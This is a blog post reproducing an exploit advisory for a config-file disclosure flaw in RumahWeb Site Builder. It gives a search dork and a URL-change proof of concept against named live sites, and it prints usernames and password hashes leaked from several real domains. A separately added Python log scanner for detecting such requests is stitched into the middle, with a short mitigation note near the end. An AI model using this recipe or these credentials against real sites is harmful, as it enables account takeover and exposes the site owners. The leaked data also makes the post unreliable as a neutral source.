intext:sitebuilder rumahweb | Girilaya Real Groups

Posted by Unknown
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 December 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb

Proof of Concept
================
[!] site/data/config/config.xml
For example, say you searched Google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or, if you got toyohashi-mosque.org/admin, change the URL to toyohashi-mosque.org/data/config/config.xml


Example :
More results? http://pastebin.com/4VZpiC7e

Source : http://go.girilaya.com/0l0qwm

Member of GIRILAYA
Learning By DOING
http://blog.girilaya.com/
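
A defender-side check for the exposure described above, added here as an example and not part of the original advisory: it scans web-server access logs (assumed to be in Apache combined format) for requests to XML files under /data/config/ and separates responses that were served from those that were refused. The sample log lines, client addresses and function names are constructed for illustration, and matching any .xml file in that directory generalizes beyond the two files this page names.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# XML files directly under the Site Builder config directory named on this page.
SENSITIVE_RE = re.compile(r'^/data/config/[^/]+\.xml$', re.IGNORECASE)

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Dec/2012:10:01:02 +0700] "GET /admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Dec/2012:10:01:09 +0700] "GET /data/config/config.xml HTTP/1.1" 200 148 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [08/Dec/2012:11:15:40 +0700] "GET /data//config/Template.xml?v=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [08/Dec/2012:12:00:00 +0700] "GET /data/config/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def normalize(target):
    """Drop the query string, percent-decode, and collapse //, ./ and ../ segments."""
    path = unquote(target.split('?', 1)[0].split('#', 1)[0])
    return posixpath.normpath('/' + path.lstrip('/'))

def find_config_requests(lines):
    """Return {client: {"disclosed": [...], "blocked": [...]}} for config-file requests."""
    report = defaultdict(lambda: {"disclosed": [], "blocked": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = normalize(m["target"])
        if not SENSITIVE_RE.match(path):
            continue
        status = int(m["status"])
        # 2xx means the file body was sent; 304 means the client already holds a copy.
        served = 200 <= status < 300 or status == 304
        bucket = "disclosed" if served else "blocked"
        report[m["client"]][bucket].append((m["ts"], path, status))
    return dict(report)

if __name__ == "__main__":
    for client, hits in find_config_requests(SAMPLE_LOG).items():
        print(client, hits)
```

Any entry under "disclosed" means the username and password hash stored in that file should be treated as exposed and changed.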

<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>

For friends who are already using this SITEBUILDER: don't worry, and don't underestimate it just yet. We can patch it too, by deleting the Template and deleting the template.xml located at /data/config/template.xml.

The example sites above are visible because they were only just created and their Template has not been deleted yet.



<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>

<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>


1 comment:

Web Hosting Murah said...

Great information, bro; hope this blog keeps growing.
